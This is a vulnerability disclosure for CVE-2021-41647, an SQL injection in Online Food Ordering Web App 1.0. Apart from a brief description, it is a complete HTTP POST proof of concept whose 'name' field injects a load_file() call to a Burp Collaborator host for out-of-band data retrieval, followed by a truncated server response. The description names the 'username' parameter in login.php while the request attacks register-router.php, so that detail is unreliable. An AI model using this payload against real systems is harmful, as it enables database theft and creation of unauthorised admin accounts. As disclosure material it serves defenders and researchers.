CVE-2021-41647
Description:
An un-authenticated error-based and time-based blind SQL injection vulnerability exists in Kaushik Jadhav Online Food Ordering Web App 1.0. An attacker can exploit the vulnerable "username" parameter in login.php and retrieve sensitive database information, as well as add an administrative user.
SQL Request:
POST /Online-Food-Ordering-Web-App-master/account/routers/register-router.php HTTP/1.1
Host: 192.168.1.180
Origin: http://192.168.1.180
Cookie: PHPSESSID=l9r6fsvj0k8ebeb4kn6qb4acee
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/Online-Food-Ordering-Web-App-master/account/register.php
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 68
username=eRmmfIOD&name=THWdzbPo'%2b(select%20load_file('%5c%5c%5c%5c6z6ghxyoj1qsw3gtl0e0hf0sljrcf3ar1upmcd02.burpcollaborator.net%5c%5cjuf'))%2b'&password=b5R%21c5j%21G5&phone=476835SQL Response:
HTTP/1.1 200 OK
Date: Wed, 06 Oct 2021 07:10:35 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.22
X-Powered-By: PHP/7.4.22
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 3775
Connection: close
Content-Type: text/html; charset=UTF-8
<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0,
...[SNIP]...